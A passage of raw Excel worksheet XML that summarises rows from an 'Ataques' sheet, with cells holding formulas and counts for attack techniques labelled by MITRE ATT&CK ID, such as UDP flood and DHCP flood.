      <c r="N68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BM68,"")</f>
        <v>0</v>
      </c>
      <c r="O68" s="532">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($K68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P68" s="292">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BN68,"")</f>
        <v>0</v>
      </c>
      <c r="Q68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BP68,"")</f>
        <v>0</v>
      </c>
      <c r="R68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BR68,"")</f>
        <v>0</v>
      </c>
      <c r="S68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BS68,"")</f>
        <v>0</v>
      </c>
      <c r="T68" s="530">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($P68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BT68,"")</f>
        <v>61</v>
      </c>
      <c r="V68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BV68,"")</f>
        <v>10</v>
      </c>
      <c r="W68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BX68,"")</f>
        <v>1</v>
      </c>
      <c r="X68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$BY68,"")</f>
        <v>10</v>
      </c>
      <c r="Y68" s="532">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($U68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z68" s="288">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!BZ68,"")</f>
        <v>20</v>
      </c>
      <c r="AA68" s="392">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!CB68,"")</f>
        <v>19</v>
      </c>
      <c r="AB68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!CD68,"")</f>
        <v>1</v>
      </c>
      <c r="AC68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!CE68,"")</f>
        <v>19</v>
      </c>
      <c r="AD68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF(Z68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CF68,"")</f>
        <v>81</v>
      </c>
      <c r="AF68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CH68,"")</f>
        <v>29</v>
      </c>
      <c r="AG68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CJ68,"")</f>
        <v>2</v>
      </c>
      <c r="AH68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CK68,"")</f>
        <v>29</v>
      </c>
      <c r="AI68" s="287">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($AE68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ68" s="292">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CL68,"")</f>
        <v>0</v>
      </c>
      <c r="AK68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CN68,"")</f>
        <v>0</v>
      </c>
      <c r="AL68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CP68,"")</f>
        <v>0</v>
      </c>
      <c r="AM68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CQ68,"")</f>
        <v>0</v>
      </c>
      <c r="AN68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($AJ68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CR68,"")</f>
        <v>5278</v>
      </c>
      <c r="AP68" s="322">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CT68,"")</f>
        <v>10</v>
      </c>
      <c r="AQ68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CV68,"")</f>
        <v>1</v>
      </c>
      <c r="AR68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!$CW68,"")</f>
        <v>10</v>
      </c>
      <c r="AS68" s="287">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($AO68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT68" s="288">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!CX68,"")</f>
        <v>5278</v>
      </c>
      <c r="AU68" s="392">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!CZ68,"")</f>
        <v>10</v>
      </c>
      <c r="AV68" s="4">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!DB68,"")</f>
        <v>1</v>
      </c>
      <c r="AW68" s="20">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",'(A) Ataques'!DC68,"")</f>
        <v>10</v>
      </c>
      <c r="AX68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($AT68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY68" s="469">
        <f>'(A) Ataques'!LU68+'(A) Ataques'!MA68+'(A) Ataques'!MG68+'(A) Ataques'!MM68+'(A) Ataques'!MS68</f>
        <v>0</v>
      </c>
      <c r="AZ68" s="510">
        <f>'(A) Ataques'!LW68+'(A) Ataques'!MC68+'(A) Ataques'!MI68+'(A) Ataques'!MO68+'(A) Ataques'!MU68</f>
        <v>0</v>
      </c>
      <c r="BA68" s="471">
        <f>'(A) Ataques'!LY68+'(A) Ataques'!ME68+'(A) Ataques'!MK68+'(A) Ataques'!MQ68+'(A) Ataques'!MW68</f>
        <v>0</v>
      </c>
      <c r="BB68" s="471">
        <f>'(A) Ataques'!LQ68</f>
        <v>0</v>
      </c>
      <c r="BC68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($AY68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD68" s="469">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!LL68,"")</f>
        <v>5276</v>
      </c>
      <c r="BE68" s="510">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!LM68,"")</f>
        <v>1</v>
      </c>
      <c r="BF68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!LN68,"")</f>
        <v>0</v>
      </c>
      <c r="BG68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!LO68,"")</f>
        <v>1</v>
      </c>
      <c r="BH68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!LS68,"")</f>
        <v>1</v>
      </c>
      <c r="BI68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($BD68=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ68" s="469">
        <f>'(A) Ataques'!OL68+'(A) Ataques'!OR68+'(A) Ataques'!OX68+'(A) Ataques'!PD68+'(A) Ataques'!PJ68</f>
        <v>0</v>
      </c>
      <c r="BK68" s="510">
        <f>'(A) Ataques'!ON68+'(A) Ataques'!OT68+'(A) Ataques'!OZ68+'(A) Ataques'!PF68+'(A) Ataques'!PL68</f>
        <v>0</v>
      </c>
      <c r="BL68" s="471">
        <f>'(A) Ataques'!OP68+'(A) Ataques'!OV68+'(A) Ataques'!PB68+'(A) Ataques'!PH68+'(A) Ataques'!PN68</f>
        <v>0</v>
      </c>
      <c r="BM68" s="495">
        <f>'(A) Ataques'!OH68</f>
        <v>0</v>
      </c>
      <c r="BN68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($BJ68=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO68" s="469">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!OC68,"")</f>
        <v>0</v>
      </c>
      <c r="BP68" s="510">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!OD68,"")</f>
        <v>0</v>
      </c>
      <c r="BQ68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!OE68,"")</f>
        <v>0</v>
      </c>
      <c r="BR68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!OF68,"")</f>
        <v>0</v>
      </c>
      <c r="BS68" s="471">
        <f>IF('(A) Ataques'!$AP68&lt;&gt;"NO",'(A) Ataques'!OJ68,"")</f>
        <v>0</v>
      </c>
      <c r="BT68" s="331">
        <f>IF('(A) Ataques'!$AK68&lt;&gt;"NO",IF($BO68=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A69" s="79">
        <f t="shared" ref="A69:A112" si="1">A68+1</f>
        <v>67</v>
      </c>
      <c r="B69" s="4">
        <f>IF('(A) Ataques'!AK69&lt;&gt;"NO",'(A) Ataques'!E69,"")</f>
        <v>47</v>
      </c>
      <c r="C69" s="474" t="str">
        <f>IF('(A) Ataques'!AK69&lt;&gt;"NO",IF('(A) Ataques'!M69="","",'(A) Ataques'!M69),"")</f>
        <v>T1498.001-UDP_flood_2</v>
      </c>
      <c r="D69" s="4" t="str">
        <f>IF('(A) Ataques'!AK69&lt;&gt;"NO",'(A) Ataques'!F69,"")</f>
        <v>T1498</v>
      </c>
      <c r="E69" s="286">
        <f>IF('(A) Ataques'!AK69&lt;&gt;"NO",'(A) Ataques'!AQ69,"")</f>
        <v>1473</v>
      </c>
      <c r="F69" s="288">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!BB69,"")</f>
        <v>0</v>
      </c>
      <c r="G69" s="392">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!BD69,"")</f>
        <v>0</v>
      </c>
      <c r="H69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!BF69,"")</f>
        <v>0</v>
      </c>
      <c r="I69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!BG69,"")</f>
        <v>0</v>
      </c>
      <c r="J69" s="530">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($F69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BH69,"")</f>
        <v>0</v>
      </c>
      <c r="L69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BJ69,"")</f>
        <v>0</v>
      </c>
      <c r="M69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BL69,"")</f>
        <v>0</v>
      </c>
      <c r="N69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BM69,"")</f>
        <v>0</v>
      </c>
      <c r="O69" s="532">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($K69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P69" s="292">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BN69,"")</f>
        <v>0</v>
      </c>
      <c r="Q69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BP69,"")</f>
        <v>0</v>
      </c>
      <c r="R69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BR69,"")</f>
        <v>0</v>
      </c>
      <c r="S69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BS69,"")</f>
        <v>0</v>
      </c>
      <c r="T69" s="530">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($P69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U69" s="475">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BT69,"")</f>
        <v>60</v>
      </c>
      <c r="V69" s="475">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BV69,"")</f>
        <v>10</v>
      </c>
      <c r="W69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BX69,"")</f>
        <v>1</v>
      </c>
      <c r="X69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$BY69,"")</f>
        <v>10</v>
      </c>
      <c r="Y69" s="532">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($U69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z69" s="288">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!BZ69,"")</f>
        <v>20</v>
      </c>
      <c r="AA69" s="392">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!CB69,"")</f>
        <v>19</v>
      </c>
      <c r="AB69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!CD69,"")</f>
        <v>1</v>
      </c>
      <c r="AC69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!CE69,"")</f>
        <v>19</v>
      </c>
      <c r="AD69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF(Z69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CF69,"")</f>
        <v>80</v>
      </c>
      <c r="AF69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CH69,"")</f>
        <v>29</v>
      </c>
      <c r="AG69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CJ69,"")</f>
        <v>2</v>
      </c>
      <c r="AH69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CK69,"")</f>
        <v>29</v>
      </c>
      <c r="AI69" s="287">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($AE69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ69" s="292">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CL69,"")</f>
        <v>0</v>
      </c>
      <c r="AK69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CN69,"")</f>
        <v>0</v>
      </c>
      <c r="AL69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CP69,"")</f>
        <v>0</v>
      </c>
      <c r="AM69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CQ69,"")</f>
        <v>0</v>
      </c>
      <c r="AN69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($AJ69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CR69,"")</f>
        <v>4856</v>
      </c>
      <c r="AP69" s="322">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CT69,"")</f>
        <v>10</v>
      </c>
      <c r="AQ69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CV69,"")</f>
        <v>1</v>
      </c>
      <c r="AR69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!$CW69,"")</f>
        <v>10</v>
      </c>
      <c r="AS69" s="287">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($AO69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT69" s="288">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!CX69,"")</f>
        <v>4856</v>
      </c>
      <c r="AU69" s="392">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!CZ69,"")</f>
        <v>10</v>
      </c>
      <c r="AV69" s="4">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!DB69,"")</f>
        <v>1</v>
      </c>
      <c r="AW69" s="20">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",'(A) Ataques'!DC69,"")</f>
        <v>10</v>
      </c>
      <c r="AX69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($AT69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY69" s="469">
        <f>'(A) Ataques'!LU69+'(A) Ataques'!MA69+'(A) Ataques'!MG69+'(A) Ataques'!MM69+'(A) Ataques'!MS69</f>
        <v>0</v>
      </c>
      <c r="AZ69" s="510">
        <f>'(A) Ataques'!LW69+'(A) Ataques'!MC69+'(A) Ataques'!MI69+'(A) Ataques'!MO69+'(A) Ataques'!MU69</f>
        <v>0</v>
      </c>
      <c r="BA69" s="471">
        <f>'(A) Ataques'!LY69+'(A) Ataques'!ME69+'(A) Ataques'!MK69+'(A) Ataques'!MQ69+'(A) Ataques'!MW69</f>
        <v>0</v>
      </c>
      <c r="BB69" s="471">
        <f>'(A) Ataques'!LQ69</f>
        <v>0</v>
      </c>
      <c r="BC69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($AY69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD69" s="469">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!LL69,"")</f>
        <v>4856</v>
      </c>
      <c r="BE69" s="510">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!LM69,"")</f>
        <v>1</v>
      </c>
      <c r="BF69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!LN69,"")</f>
        <v>0</v>
      </c>
      <c r="BG69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!LO69,"")</f>
        <v>1</v>
      </c>
      <c r="BH69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!LS69,"")</f>
        <v>1</v>
      </c>
      <c r="BI69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($BD69=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ69" s="469">
        <f>'(A) Ataques'!OL69+'(A) Ataques'!OR69+'(A) Ataques'!OX69+'(A) Ataques'!PD69+'(A) Ataques'!PJ69</f>
        <v>0</v>
      </c>
      <c r="BK69" s="510">
        <f>'(A) Ataques'!ON69+'(A) Ataques'!OT69+'(A) Ataques'!OZ69+'(A) Ataques'!PF69+'(A) Ataques'!PL69</f>
        <v>0</v>
      </c>
      <c r="BL69" s="471">
        <f>'(A) Ataques'!OP69+'(A) Ataques'!OV69+'(A) Ataques'!PB69+'(A) Ataques'!PH69+'(A) Ataques'!PN69</f>
        <v>0</v>
      </c>
      <c r="BM69" s="495">
        <f>'(A) Ataques'!OH69</f>
        <v>0</v>
      </c>
      <c r="BN69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($BJ69=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO69" s="469">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!OC69,"")</f>
        <v>0</v>
      </c>
      <c r="BP69" s="510">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!OD69,"")</f>
        <v>0</v>
      </c>
      <c r="BQ69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!OE69,"")</f>
        <v>0</v>
      </c>
      <c r="BR69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!OF69,"")</f>
        <v>0</v>
      </c>
      <c r="BS69" s="471">
        <f>IF('(A) Ataques'!$AP69&lt;&gt;"NO",'(A) Ataques'!OJ69,"")</f>
        <v>0</v>
      </c>
      <c r="BT69" s="331">
        <f>IF('(A) Ataques'!$AK69&lt;&gt;"NO",IF($BO69=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A70" s="79">
        <f t="shared" si="1"/>
        <v>68</v>
      </c>
      <c r="B70" s="4">
        <f>IF('(A) Ataques'!AK70&lt;&gt;"NO",'(A) Ataques'!E70,"")</f>
        <v>48</v>
      </c>
      <c r="C70" s="6" t="str">
        <f>IF('(A) Ataques'!AK70&lt;&gt;"NO",IF('(A) Ataques'!M70="","",'(A) Ataques'!M70),"")</f>
        <v>T1499.002-Dhcp_flood</v>
      </c>
      <c r="D70" s="4" t="str">
        <f>IF('(A) Ataques'!AK70&lt;&gt;"NO",'(A) Ataques'!F70,"")</f>
        <v>T1499</v>
      </c>
      <c r="E70" s="286">
        <f>IF('(A) Ataques'!AK70&lt;&gt;"NO",'(A) Ataques'!AQ70,"")</f>
        <v>2</v>
      </c>
      <c r="F70" s="288">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!BB70,"")</f>
        <v>0</v>
      </c>
      <c r="G70" s="392">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!BD70,"")</f>
        <v>0</v>
      </c>
      <c r="H70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!BF70,"")</f>
        <v>0</v>
      </c>
      <c r="I70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!BG70,"")</f>
        <v>0</v>
      </c>
      <c r="J70" s="530">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($F70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BH70,"")</f>
        <v>0</v>
      </c>
      <c r="L70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BJ70,"")</f>
        <v>0</v>
      </c>
      <c r="M70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BL70,"")</f>
        <v>0</v>
      </c>
      <c r="N70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BM70,"")</f>
        <v>0</v>
      </c>
      <c r="O70" s="532">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($K70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P70" s="292">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BN70,"")</f>
        <v>0</v>
      </c>
      <c r="Q70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BP70,"")</f>
        <v>0</v>
      </c>
      <c r="R70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BR70,"")</f>
        <v>0</v>
      </c>
      <c r="S70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BS70,"")</f>
        <v>0</v>
      </c>
      <c r="T70" s="530">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($P70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BT70,"")</f>
        <v>1</v>
      </c>
      <c r="V70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BV70,"")</f>
        <v>1</v>
      </c>
      <c r="W70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BX70,"")</f>
        <v>1</v>
      </c>
      <c r="X70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$BY70,"")</f>
        <v>1</v>
      </c>
      <c r="Y70" s="532">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($U70=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z70" s="288">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!BZ70,"")</f>
        <v>69</v>
      </c>
      <c r="AA70" s="392">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!CB70,"")</f>
        <v>1</v>
      </c>
      <c r="AB70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!CD70,"")</f>
        <v>1</v>
      </c>
      <c r="AC70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!CE70,"")</f>
        <v>1</v>
      </c>
      <c r="AD70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF(Z70=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CF70,"")</f>
        <v>70</v>
      </c>
      <c r="AF70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CH70,"")</f>
        <v>2</v>
      </c>
      <c r="AG70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CJ70,"")</f>
        <v>2</v>
      </c>
      <c r="AH70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CK70,"")</f>
        <v>1</v>
      </c>
      <c r="AI70" s="287">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($AE70=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ70" s="292">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CL70,"")</f>
        <v>0</v>
      </c>
      <c r="AK70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CN70,"")</f>
        <v>0</v>
      </c>
      <c r="AL70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CP70,"")</f>
        <v>0</v>
      </c>
      <c r="AM70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CQ70,"")</f>
        <v>0</v>
      </c>
      <c r="AN70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($AJ70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CR70,"")</f>
        <v>0</v>
      </c>
      <c r="AP70" s="322">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CT70,"")</f>
        <v>0</v>
      </c>
      <c r="AQ70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CV70,"")</f>
        <v>0</v>
      </c>
      <c r="AR70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!$CW70,"")</f>
        <v>0</v>
      </c>
      <c r="AS70" s="287">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($AO70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT70" s="288">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!CX70,"")</f>
        <v>0</v>
      </c>
      <c r="AU70" s="392">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!CZ70,"")</f>
        <v>0</v>
      </c>
      <c r="AV70" s="4">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!DB70,"")</f>
        <v>0</v>
      </c>
      <c r="AW70" s="20">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",'(A) Ataques'!DC70,"")</f>
        <v>0</v>
      </c>
      <c r="AX70" s="331">
        <f>IF('(A) Ataques'!$AK70&lt;&gt;"NO",IF($AT70=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY70" s="469">
        <f>'(A) Ataques'!LU70+'(A) Ataques'!MA70+'(A) Ataques'!MG70+'(A) Ataques'!MM70+'(A) Ataques'!MS70</f>
        <v>0</v>
      </c>
      <c r="AZ70" s="510">
        <f>'(A) Ataques'!LW70+'(A) Ataques'!MC70+'(A) Ataques'!MI70+'(A) Ataques'!MO70+'(A) Ataques'!MU70</f>
        <v>0</v>
      </c>
